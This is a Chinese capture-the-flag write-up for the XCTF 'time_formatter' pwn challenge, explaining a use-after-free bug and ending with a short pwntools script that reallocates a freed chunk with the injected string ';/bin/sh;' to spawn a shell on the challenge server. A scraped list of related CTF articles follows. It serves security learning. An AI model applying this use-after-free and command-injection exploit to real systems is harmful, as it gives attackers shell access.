[攻防世界 pwn]——time_formatter

  • 题目地址: https://adworld.xctf.org.cn/
  • 题目:

    这是一道堆利用的题, UAFF(use After Free)漏洞

peak小知识

  1. 堆空间释放后,指针不指向NULL,就仍指向该空间,并且重新申请的堆空间就是最先释放的堆空间
  2. Linux中 echo “;ls;cat flag;/bin/sh;”
    ls ,cat flag , /bin/sh, 会挨个执行

老规矩还是先checksec一下

在IDA中查看一下反汇编的源代码


sub_400D26()函数是为了让你们输入选项。

我们仔细看看各个代码,

选项1,申请空间


选项5,释放ptr 和value的空间,但是都没有指向NULL。指针仍然指向原空间。

选项4里面有我们, 心中年年不忘的system函数。首先它判断ptr是否为空,我们只要让ptr等于"/bin/sh"就可以获得shell了

在选项3中,也是申请一个新的堆空间,ptr释放后没有指向NULL, 新申请的空间也就是ptr指向的空间

思路

  • 选择选项1,申请空间
  • 选择选项5,释放空间,但是不退出程序
  • 选择选项3,将释放的空间重新申请,并写入 “/bin/sh”
  • 选择选项4,获得shell

exploit

from pwn import *
p = remote("111.200.241.244",57231)p.sendlineafter("> ","1")
p.sendlineafter("Format: ","A")
p.sendlineafter("> ","5")
p.sendlineafter("Are you sure you want to exit (y/N)? ",'N')
p.sendlineafter("> ","3")
p.sendlineafter("Time zone: ","';/bin/sh;'")
p.sendlineafter("> ","4")
p.interactive()

[攻防世界 pwn]——time_formatter(内涵peak小知识)相关推荐

  1. [Jarvis OJ - PWN]——Typo(内涵peak小知识)

    [Jarvis OJ - PWN]--Typo 题目地址: https://www.jarvisoj.com/challenges 题目: 还是先check一下, 是arm架构.还是第一次遇到. pe ...

  2. [攻防世界 pwn]——pwn1(内涵peak小知识)

    [攻防世界 pwn]--pwn1 题目地址:https://adworld.xctf.org.cn/ 题目: peak小知识 这道题目的关键就是泄露canary,通常我们泄露canary有两种方法,遇 ...

  3. [攻防世界 pwn]——string(内涵peak小知识)

    [攻防世界 pwn]--string 题目地址:https://adworld.xctf.org.cn/ 题目: peak小知识 mmap函数作用,mmap主要是将文件映射到一段内存去同时设置那段内存 ...

  4. [BUUCTF-pwn]——[极客大挑战 2019]Not Bad(ORW)(内涵peak小知识)

    [BUUCTF-pwn]--[极客大挑战 2019]Not Bad 又是一道收获满满的题目. peak小知识 seccomp: seccomp是一种内核中的安全机制,正常情况下,程序可以使用所有的sy ...

  5. [BUUCTF-pwn]——mrctf2020_shellcode_revenge(可见字符shellcode)(内涵peak小知识)

    [BUUCTF-pwn]--mrctf2020_shellcode_revenge(可见字符shellcode) 检查了下保护发现NX 没有开,肯定要自己写shellcode呀. 不过这道题,刷新了我 ...

  6. [BUUCTF-pwn]——picoctf_2018_leak_me(内涵peak小知识)

    [BUUCTF-pwn]--picoctf_2018_leak_me 题目没什么难度,但是可能反汇编的时候你们可能会出现一些问题. peak小知识 pwn题,有时会碰到无法反汇编的情况,大多数情况下, ...

  7. [BUUCTF-pwn]——ciscn_2019_es_2(内涵peak小知识)

    [BUUCTF-pwn]--ciscn_2019_es_2 题目地址: https://buuoj.cn/challenges#ciscn_2019_es_2 这是一道栈劫持的题,第一次写这种题的题解 ...

  8. [攻防世界 pwn]——pwn-200

    [攻防世界 pwn]--pwn-200 题目地址: https://adworld.xctf.org.cn/ 题目: peak小知识 ret2libc的题型, 一般给一个输出和一个输入的函数, 输入一 ...

  9. 攻防世界 Pwn 进阶 第一页

    00 要把它跟之前新手区的放在一起总结,先稍稍回顾一下新手区. 攻防世界 Pwn 新手 1.栈溢出,从简单到难,开始有后门函数,到需要自己写函数参数,到最后的ret2libc. 常见漏洞点有read( ...

最新文章

  1. 虚拟化中的SR-IOV
  2. hdu 4587 2013南京邀请赛B题/ / 求割点后连通分量数变形。
  3. Spring入门详细教程(四)
  4. 谈Apache OFbiz 会员模块表结构设计
  5. f2 柱状图滚动 钉钉小程序_详解钉钉小程序组件之自定义模态框(弹窗封装实现)...
  6. cpu工作原理flash动画_17张PLC工作原理动画,每一个都是经典
  7. 【转】ABP源码分析九:后台工作任务
  8. 一个测试新人的职业规划——三个月
  9. 大型架构.net平台篇(WEB层均衡负载nginx)
  10. linux scp 非22端口,[ssh scp sftp] 连接远程ssh非22端口的服务器方法
  11. 计算实到人数用计算机也怎么算,商场客流量系统实现准确人数统计-俊竹客流计算器...
  12. 加密狗登录PHP开发,C# 使用加密狗登录 示例源码
  13. 时域反射仪(TDR)介绍
  14. 以太坊为什么又要进行“缪尔冰川”硬分叉?
  15. LINE登录手机后怎样更换别个账号_LINE是什么?怎么开LINE广告账户推广运营?
  16. error:src refspec xxx does not match any的原因及解决办法
  17. 决策智能概念里的风起云涌
  18. 爱他美英国和德国价格查询_德国,以色列和英国转向开源,新的无人驾驶汽车技术以及更多新闻...
  19. “天问一号”火星车命名由来
  20. 如何与人进行有效沟通

热门文章

  1. [导入].Net2.0 使用ConfigurationManager读写配置文件
  2. sql注入_1-7_绕过注入
  3. [网络安全自学篇] 二十九.文件上传和IIS6.0解析问题及防御原理(二)
  4. SwiftUI之深入解析高级动画的时间轴TimelineView
  5. Python之列表表达式及高阶函数lamda、zip、enumerate、map和filter方法
  6. 2013\National _C_C++_A\1.填算式
  7. Google 都在用的 6 个休息小技巧,让你工作效率翻倍
  8. 【MFC】工具栏按钮单选效果
  9. 【MFC】CDialog类详解
  10. 母版页 中 html 乱码,Thymeleaf使用技巧:使用片段(fragment)实现母版页(Layout)功能...